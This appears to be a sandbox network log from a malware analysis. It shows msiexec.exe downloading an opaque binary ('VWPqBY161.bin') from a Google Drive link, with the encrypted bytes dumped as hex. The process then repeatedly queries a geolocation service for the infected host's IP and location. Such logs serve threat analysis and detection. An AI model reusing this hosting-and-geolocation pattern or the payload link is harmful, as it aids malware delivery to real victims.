                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Server: ESF
                                                                            Content-Length: 0
                                                                            X-XSS-Protection: 0
                                                                            X-Frame-Options: SAMEORIGIN
                                                                            X-Content-Type-Options: nosniff
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.1049977142.250.185.654434104C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-23 15:23:45 UTC258OUTGET /download?id=12MwqeCdK8xb_X0qoPbapEA6uXWAlxo8b&export=download HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                            Cache-Control: no-cache
                                                                            Host: drive.usercontent.google.com
                                                                            Connection: Keep-Alive
                                                                            2024-10-23 15:23:47 UTC4893INHTTP/1.1 200 OK
                                                                            Content-Type: application/octet-stream
                                                                            Content-Security-Policy: sandbox
                                                                            Content-Security-Policy: default-src 'none'
                                                                            Content-Security-Policy: frame-ancestors 'none'
                                                                            X-Content-Security-Policy: sandbox
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Cross-Origin-Embedder-Policy: require-corp
                                                                            Cross-Origin-Resource-Policy: same-site
                                                                            X-Content-Type-Options: nosniff
                                                                            Content-Disposition: attachment; filename="VWPqBY161.bin"
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Credentials: false
                                                                            Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                            Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                            Accept-Ranges: bytes
                                                                            Content-Length: 275008
                                                                            Last-Modified: Wed, 23 Oct 2024 10:00:29 GMT
                                                                            X-GUploader-UploadID: AHmUCY1VLAeRiRWkC4XoAJCpr3d2mbbvdyuaKmlmJ-CHKGwf0-TRMtms0-k8V7qaG7GTKdnXO1sr0ZyyMg
                                                                            Date: Wed, 23 Oct 2024 15:23:47 GMT
                                                                            Expires: Wed, 23 Oct 2024 15:23:47 GMT
                                                                            Cache-Control: private, max-age=0
                                                                            X-Goog-Hash: crc32c=CVDB1A==
                                                                            Server: UploadServer
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Connection: close
                                                                            2024-10-23 15:23:47 UTC4893INData Raw: c6 c8 48 1c 33 07 15 c2 9c e3 8e 8a 9f e4 c5 d3 2e 16 e5 2a fe 83 26 e8 ed 04 ff 9f c6 ec 4e e5 9f 0d 40 fb bb fb 8b 6f 68 05 ce 9f 13 d9 03 3f 1a 2e 3d 72 d2 06 eb d1 d7 d7 ef e1 38 3a 28 d9 67 b8 b5 a0 34 44 52 2c cf 6d 2e dd 04 ac c9 82 02 8a 75 61 2d 87 a2 8d 10 a3 63 c3 15 b4 dd 60 ba 25 07 7e 9a 4b a6 fa ca 1a 9f c9 53 45 db fb e0 d9 56 a2 32 e5 82 33 4f 97 3e 2a 4f 7a 06 6e 76 21 8d 72 d3 96 c6 7c ff dc 7c 34 7d f0 46 da 2f 64 0d 82 53 ef ff 68 8a 2d 9c 96 d8 ea be 95 1b ec a1 fd 5c c9 68 31 13 50 67 cc e6 ca a0 af 68 a4 28 8a c6 0d 1a 7b 70 c2 e5 44 c6 d3 ff db 67 73 26 76 f3 2f 68 fb 32 de 19 68 a3 78 5a 99 63 ed bd ae 6c 52 90 07 f6 22 52 31 a8 e7 b1 5c 95 61 99 e3 b6 fb 6d 41 5c fb a5 76 ba 87 dc 1e 52 ab 28 bd 74 d3 3f f4 3d c6 2e e7 43 fb 7a
                                                                            Data Ascii: H3.*&N@oh?.=r8:(g4DR,m.ua-c`%~KSEV23O>*Oznv!r||4}F/dSh-\h1Pgh({pDgs&v/h2hxZclR"R1\amA\vR(t?=.Cz
                                                                            2024-10-23 15:23:47 UTC4893INData Raw: 05 17 5a 73 b9 07 45 f1 95 c6 34 fa 38 f0 6b 3b ce a3 0b d5 96 19 96 05 38 49 d6 f0 dc 02 36 1a 71 01 f7 6e c7 47 71 d5 7a e9 3d 86 95 d6 d7 23 b3 2a 50 18 ce 3a d6 2d de c1 cd 32 50 51 aa 95 87 22 01 5e 7f bd 81 3c bf 75 36 ea b0 09 1e cd c2 41 c1 b5 f1 47 f6 c9 4e 10 31 75 10 cb d5 75 0e a6 a5 e2 99 fd 8f d4 85 ea a6 a8 d5 e7 e2 6a f5 90 26 5d b2 d7 cb 00 7f be a7 93 a5 6d 75 f7 52 f2 ed 9b 06 3f 91 cc 54 72 1e f1 50 17 32 66 11 c4 3f 2e b6 84 cc 63 00 fc 86 ce 15 5a 70 8f 79 0b 61 d7 cc 78 c6 fd ef 73 56 87 bc 39 e7 f5 8c 11 e9 94 5e c7 87 fa 42 68 da 90 eb 53 15 ee 26 a3 93 c7 de ea ed ff 0e da c5 ef 38 35 5d 53 8b b2 9f 56 a1 85 35 3d ce ba 30 a3 53 67 15 8c 11 f2 84 f2 7c 87 07 cb 0f 16 a2 18 e2 04 ef a4 90 c4 00 e2 d6 e1 a3 21 ce 88 90 d9 35 55 c5
                                                                            Data Ascii: ZsE48k;8I6qnGqz=#*P:-2PQ"^<u6AGN1uuj&]muR?TrP2f?.cZpyaxsV9^BhS&85]SV5=0Sg|!5U
                                                                            2024-10-23 15:23:47 UTC20INData Raw: 95 d9 dd e9 4d af e2 d2 fc af c8 96 23 25 ae e3 e5 3b 92 8e
                                                                            Data Ascii: M#%;
                                                                            2024-10-23 15:23:47 UTC1322INData Raw: 90 20 0c 52 a9 7a 75 7c 02 00 2f a9 da f1 d7 f4 91 7e f6 2a 0d 0a c3 94 c2 90 8c 52 27 29 93 ad 2f d1 05 5b 18 ce 53 0a 31 6f 1d 56 df c4 70 de 63 62 a9 0f d3 14 da 2d 30 01 77 4c 81 e8 b2 3a 5f 87 3c 8a 5e 8d dc 8d f0 41 59 85 35 4a 65 d5 7e 37 22 8c 3d d1 7b 6f b5 8f 8c 8d 25 a2 94 70 1c 0d 6d 82 bb 33 23 89 cd da 1d 10 8a af 51 86 de f8 3f 7f b6 37 27 c2 ff 25 12 ee 1d 11 d3 65 d7 30 bb 21 d8 ca b6 58 5b b7 0e 84 53 4a d7 76 4d 2c 1b 9b 34 28 d1 6a 28 7a a3 50 dd 38 9a 6a 33 96 6f c2 cf 28 56 ff aa aa b1 89 fb 66 eb 58 b3 77 43 f2 95 e9 94 df 24 5c cd 34 df de 85 f5 f2 14 f9 0e 57 81 dc f0 0a dc 58 03 59 35 f3 1d 04 54 7e df 41 82 43 b7 9f 08 d3 51 ce 28 50 29 94 12 57 2f de cb db 96 51 42 a0 b3 8c 0e 0d de 77 aa ee f8 bf 75 3c ea b0 22 15 cf d3 48 d7
                                                                            Data Ascii: Rzu|/~*R')/[S1oVpcb-0wL:_<^AY5Je~7"={o%pm3#Q?7'%e0!X[SJvM,4(j(zP8j3o(VfXwC$\4WXY5T~ACQ(P)W/QBwu<"H
                                                                            2024-10-23 15:23:47 UTC1378INData Raw: 8d a6 dd 80 ff 20 92 67 61 5c a7 e3 ee 1b 0d 2f 87 91 9d de 8e 01 25 bc 6f a0 e1 2c 08 e7 51 6a 8b 17 e2 a6 fd b1 e6 3c 70 58 87 21 8d 13 da 99 f6 99 43 0c 1b 46 a7 ea 32 07 1b 52 11 ed 28 c8 02 69 0c 04 23 87 e7 95 08 53 8b d9 a4 37 bd 7f e5 c7 e4 34 de c8 f2 53 24 9a 5d 6a 78 ba dd a4 54 d2 9e d8 26 11 5e 27 b1 3f f0 6a 79 a6 a9 ae d1 65 03 56 ab 51 d7 dc 57 6f eb 56 31 2e 10 c8 ff 96 b6 23 63 c0 c7 8a cb 4c 14 ed b7 cb 66 04 17 f2 29 63 8f 4f f5 37 16 5f f2 34 d1 05 16 3d 55 03 a8 87 f7 90 27 ff 41 2a 9f 8d bb 3c a6 97 02 4d 25 c2 92 ab 81 96 fa aa e9 93 8b b9 c8 e6 58 25 46 b9 71 41 a4 99 4f f6 77 d8 ff bb ac c2 ed 77 8c 6e f0 79 2b b0 d6 e6 c7 50 37 f9 8c eb 0e 83 44 ee 39 31 eb 2b e1 59 29 02 82 ac b9 06 0c e3 77 af 65 a9 b0 7e b0 6d d4 1b fb c5 8c
                                                                            Data Ascii: ga\/%o,Qj<pX!CF2R(i#S74S$]jxT&^'?jyeVQWoV1.#cLf)cO7_4=U'A*<M%X%FqAOwwny+P7D91+Y)we~m
                                                                            2024-10-23 15:23:47 UTC1378INData Raw: 68 20 ab 4b 91 fe bd 0a 87 15 bd 81 df e3 0c 59 99 7c cb d4 ec 4c 64 71 54 1e b4 40 02 a1 08 88 e6 8f f7 70 16 31 da 1f 75 9b 15 9f 25 60 9f d7 94 c7 fe 9a 39 e9 e1 e3 60 da 3b e5 c8 d2 19 61 8d b3 28 0c 60 31 76 b1 a9 45 f6 85 04 57 7e 59 c3 2b 7c ab 12 17 1b e0 58 53 7d 17 f2 a8 00 3e 9c ee 2d 85 01 4f 39 80 39 21 3b 79 2c 5f 2b 59 9f 8d da 30 6d 47 13 b0 18 a0 2f ae 95 f0 f0 7a d6 74 87 06 9d 41 46 5c 1d 28 d5 72 0c 8f 37 90 46 f7 3f cc a5 92 1b 51 80 04 bd 41 42 eb 5b a5 03 65 3c d7 5a 92 fd 91 fa 34 17 b9 ac 6f 44 8a df 30 85 4a bf a3 c6 67 1c bd bc 6d e6 d8 80 bb 0c a2 a4 a8 de 51 e4 46 f9 64 0e 75 d2 a6 dc e8 14 c0 0f e2 f2 bb 23 7f b0 ad 22 de 67 f7 37 5b 84 a0 8b e3 6f ad 59 27 3a 5a 07 29 ee 41 69 67 20 d5 37 8f 6a b5 15 9a b5 50 d2 53 79 d0 17
                                                                            Data Ascii: h KY|LdqT@p1u%`9`;a(`1vEW~Y+|XS}>-O99!;y,_+Y0mG/ztAF\(r7F?QAB[e<Z4oD0JgmQFdu#"g7[oY':Z)Aig 7jPSy
                                                                            2024-10-23 15:23:47 UTC1378INData Raw: 8d cc 31 3f ef b7 0a bf 7e 07 e2 c8 39 b6 93 66 dd 2e f6 59 2c 4e e0 67 52 d2 7b 91 65 ba 76 57 0f a5 02 4b 75 59 19 e1 31 0b 44 9b c9 a8 45 62 2f ab bd 15 20 6b 7b b8 4f 56 44 06 50 ef b6 54 b5 63 72 b2 74 ec 9a 5b 7b a4 d3 9e 10 79 23 b8 c9 90 d7 b0 7d 5d 78 24 b2 b3 76 e9 c4 0b ba 68 73 c0 65 a7 4f 52 8d a3 55 3e 7e 7e 23 c2 e9 ba 7a 01 6c e0 3c 03 ed de 78 1d a4 c1 8d df 1f 23 8d 26 ff 0e be 71 a7 8e 5b 82 43 22 ab ed bf d3 3b e7 7c d4 4a e5 5b 33 55 4a f6 aa ce 5d 4b 6f f7 c0 90 e4 57 6b 6f 06 34 4d f6 58 34 5b e0 09 53 de 4f 0a d7 17 2d 8a 89 81 a1 11 c3 e2 eb c3 df 90 ac 79 de 14 09 97 4a 40 86 7f 5a 1e bd 4b 1a af f2 2d b7 fa 73 ab ff af 11 c2 24 57 e9 61 f3 c0 67 b4 79 a2 3a f5 f2 30 54 7d fe 15 43 99 88 c7 de 84 4c a1 41 6f b2 e6 d2 4e 64 74 c0
                                                                            Data Ascii: 1?~9f.Y,NgR{evWKuY1DEb/ k{OVDPTcrt[{y#}]x$vhseORU>~~#zl<x#&q[C";|J[3UJ]KoWko4MX4[SO-yJ@ZK-s$Wagy:0T}CLAoNdt
                                                                            2024-10-23 15:23:47 UTC1378INData Raw: 8c 67 d0 d6 f8 3a 2d 32 e9 8f ba 82 25 da 9f 5a 9d dd bf 3a b2 47 0f 11 57 11 f8 9d f4 6d b9 c6 a4 63 16 a2 12 f4 f2 97 a4 81 c8 2c ca c7 eb cc 20 e6 ff 9a d9 e3 44 dd 40 6a e2 25 a1 12 52 20 99 c0 6d 5e f5 ba 53 c9 84 18 af 62 1f 68 87 a2 89 f2 86 7b b1 c1 a5 dd 10 92 65 07 7e 9c e9 83 e3 b4 5c 9f c9 57 e7 fe e1 92 d9 44 a2 42 47 a7 28 54 1a 7e 2a cf 7b 23 78 0a bc 27 7c a3 80 ea a6 f6 d0 7d 78 ba 73 37 aa 34 6d 38 f2 51 22 bd 03 c3 f4 bc f5 b3 26 f5 e0 1d 90 d1 98 0c 19 35 2a 33 39 03 4e 8a f0 f3 8f 0f d8 52 9d 2a 15 17 01 2a dd e5 44 c2 fb b6 db 37 3c 54 c6 ad 2e 1b d3 a9 5b 89 08 b2 66 4b 8d 4b a9 bd ae 8a 52 4f 87 fc 23 02 14 80 cf b5 5c 9f 66 86 e3 9e 99 6d 41 b8 1e a1 76 ba a7 dc 60 66 eb 2c b9 06 84 7d f4 4d f0 06 66 43 f9 70 99 ac 72 b8 37 17 76
                                                                            Data Ascii: g:-2%Z:GWmc, D@j%R m^Sbh{e~\WDBG(T~*{#x'|}xs74m8Q"&5*39NR**D7<T.[fKKRO#\fmAv`f,}MfCpr7v
                                                                            2024-10-23 15:23:47 UTC1378INData Raw: b9 42 1d c3 77 46 8b f2 d5 81 57 f9 0c 8a 80 85 af 47 dc 46 5a 85 f0 4a 65 d5 7e fa f4 f0 dd f9 4f 65 cb b8 9f 89 21 e5 30 70 1c 0d b0 f0 b5 41 a1 99 cd aa 4b 96 8a af 5f 86 11 ea 3f 7f 88 44 a6 c2 f5 40 c3 10 1c 08 d6 65 da 14 fc 63 d8 ca c9 52 4d c5 56 f9 62 38 75 23 4c 2c 2e 9b 34 28 65 b1 31 1b d3 4e db 71 08 4e 2a e8 57 d6 31 2a c9 da b0 de 58 46 fb 16 43 55 69 09 69 f8 95 9e f4 fa 38 24 76 3c ce a9 59 e7 87 14 fd 77 fb 49 dc fa 6f 18 26 3f 53 35 e6 69 a2 91 7e d5 58 f5 00 86 9f 0c b8 e5 99 2a 5a 59 93 3d a4 ad ce c1 bd 40 e4 51 aa a8 f4 ba 11 cf 0e 95 da 32 bf 7f 59 2d b0 09 14 cf d3 46 dc 95 b0 47 f6 d3 6b 06 43 99 07 cb a5 d9 2b b1 8d 56 99 fd 85 76 a0 f2 d4 df da e7 92 1f d1 89 58 bd b3 d7 cf b2 5a a4 d5 ed a6 6d 04 4e 47 ea 93 0a 06 3f 95 7d 71
                                                                            Data Ascii: BwFWGFZJe~Oe!0pAK_?D@ecRMVb8u#L,.4(e1NqN*W1*XFCUii8$v<YwIo&?S5i~X*ZY=@Q2Y-FGkC+VvXZmNG?}q
                                                                            2024-10-23 15:23:47 UTC1378INData Raw: f2 86 f9 d1 07 47 80 81 f8 d7 25 69 9a 49 41 8c 31 f9 c8 ae b6 29 76 40 9c d0 b9 77 13 c5 f9 69 43 19 69 0c 39 46 a3 d9 d0 2b 6e 7c c7 34 89 c5 3e 48 5f dd a2 e8 ab 90 59 c2 52 08 80 72 ac 3e a6 e6 31 73 d6 80 85 a1 e7 ca de ae e5 36 af 95 9e 59 f0 7d 34 cf 7f 64 c2 49 36 e0 09 90 5d 9e bf 48 7c 6d fe 5f 51 5c 43 60 88 9c c7 20 9f cf b6 83 1e f5 44 ea 91 14 d1 59 77 56 29 5a 57 89 a2 72 26 e3 09 94 c7 8c a8 1d 3a 10 b6 7c 59 9d 87 d2 f1 e0 7a 90 0a e4 fd 19 8b 81 fa f6 00 1a 1c 9e 4c 58 1a 7e 75 16 f0 1c 79 da 27 8c 9e 1e 36 f5 bf 66 58 e4 ce 4b f8 73 e4 b8 80 a6 17 fb 0a 68 8c fe ea 5f c3 fe 54 46 9f 06 77 1d 91 2a 73 fe 40 4b bd 9c 17 0e 19 f3 a2 72 a2 aa be 65 4c 26 23 f3 4d 18 aa 00 e3 55 16 27 88 cc b7 d2 c7 27 9a b0 be 91 d1 4d ab 94 27 db b5 ca bb
                                                                            Data Ascii: G%iIA1)v@wiCi9F+n|4>H_YRr>1s6Y}4dI6]H|m_Q\C` DYwV)ZWr&:|YzLX~uy'6fXKsh_TFw*s@KreL&#MU''M'


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            4192.168.2.1049980188.114.96.34434104C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-23 15:23:51 UTC87OUTGET /xml/173.254.250.90 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            Connection: Keep-Alive
                                                                            2024-10-23 15:23:51 UTC906INHTTP/1.1 200 OK
                                                                            Date: Wed, 23 Oct 2024 15:23:51 GMT
                                                                            Content-Type: application/xml
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            access-control-allow-origin: *
                                                                            vary: Accept-Encoding
                                                                            Cache-Control: max-age=86400
                                                                            CF-Cache-Status: HIT
                                                                            Age: 32967
                                                                            Last-Modified: Wed, 23 Oct 2024 06:14:24 GMT
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CIsicn%2BAgACqDVAdqCek1KFq%2Fxiq2lleP8PnT2%2FkapcfHftUHQ%2B%2By9Ws4%2BLXHprT9%2B1Y4UDfraVW0N52djxstkZ4285unHZlcRdxdxKRj7rPxGuOJXtl7DycFEYGPNl0P%2BR%2B4mcL"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d72bb0fba48e7eb-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2122&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=1313378&cwnd=251&unsent_bytes=0&cid=a0448c1a7b9a4f03&ts=179&x=0"
                                                                            2024-10-23 15:23:51 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                            Data Ascii: 167<Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                            2024-10-23 15:23:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            5192.168.2.1049981188.114.96.34434104C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-23 15:23:52 UTC63OUTGET /xml/173.254.250.90 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            2024-10-23 15:23:52 UTC896INHTTP/1.1 200 OK
                                                                            Date: Wed, 23 Oct 2024 15:23:52 GMT
                                                                            Content-Type: application/xml
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            access-control-allow-origin: *
                                                                            vary: Accept-Encoding
                                                                            Cache-Control: max-age=86400
                                                                            CF-Cache-Status: HIT
                                                                            Age: 32968
                                                                            Last-Modified: Wed, 23 Oct 2024 06:14:24 GMT
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2X8yRVTRBw7ZMFLUIsA2wzE7VuIRGl7w5aVBl631%2FPvsWZUb0QErxzhmV0r5S10ZYw5N1EDPlHkBhRHf%2BbODZUOQwr6hB9XuThuT8eBqEMxCHBCZ%2Bl6Vd56I8ltXQZP22p0nM%2B3b"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d72bb160db14635-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1265&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2276729&cwnd=248&unsent_bytes=0&cid=615a18fb047271cd&ts=187&x=0"
                                                                            2024-10-23 15:23:52 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                            Data Ascii: 167<Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                            2024-10-23 15:23:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            6192.168.2.1049983188.114.96.34434104C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-23 15:23:54 UTC63OUTGET /xml/173.254.250.90 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            2024-10-23 15:23:54 UTC900INHTTP/1.1 200 OK
                                                                            Date: Wed, 23 Oct 2024 15:23:54 GMT
                                                                            Content-Type: application/xml
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            access-control-allow-origin: *
                                                                            vary: Accept-Encoding
                                                                            Cache-Control: max-age=86400
                                                                            CF-Cache-Status: HIT
                                                                            Age: 32970
                                                                            Last-Modified: Wed, 23 Oct 2024 06:14:24 GMT
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j2fG9G04zLJVxD4vbPsM3QqWXMchxrAENFOnOdpzNe2lE7Ckd%2B8G%2F2dcHvgVqCqDzMjjrGkX6%2FhBPaB2btU2XP%2BxznSOQF1%2BQvsHeqWgIGoR2q%2BZMZhHYfzH6nmFwmvphezL2mKs"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d72bb206f2a2ca9-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1620&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1785450&cwnd=251&unsent_bytes=0&cid=9df8be6d7b37c13d&ts=177&x=0"
                                                                            2024-10-23 15:23:54 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                            Data Ascii: 167<Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                            2024-10-23 15:23:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            7192.168.2.1049985188.114.96.34434104C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-23 15:23:56 UTC87OUTGET /xml/173.254.250.90 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            Connection: Keep-Alive
                                                                            2024-10-23 15:23:56 UTC896INHTTP/1.1 200 OK
                                                                            Date: Wed, 23 Oct 2024 15:23:56 GMT
                                                                            Content-Type: application/xml
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            access-control-allow-origin: *
                                                                            vary: Accept-Encoding
                                                                            Cache-Control: max-age=86400
                                                                            CF-Cache-Status: HIT
                                                                            Age: 32972
                                                                            Last-Modified: Wed, 23 Oct 2024 06:14:24 GMT
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RdVV5x2NDBwIMPIckqzHEB5SVl6n1hBe4yQBdTtAvr%2FKQIL8aQ1KhzKy0jGFeSa42ddWAwfekd61iRRZfsoVA%2FWniuSmTfx%2Bp1v5NOX3QQFDSxYGQKIPvrXt6abEY0F6k%2BGlTNMP"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d72bb2ba9c12839-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1366&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2043754&cwnd=238&unsent_bytes=0&cid=c33d8240eceebded&ts=167&x=0"
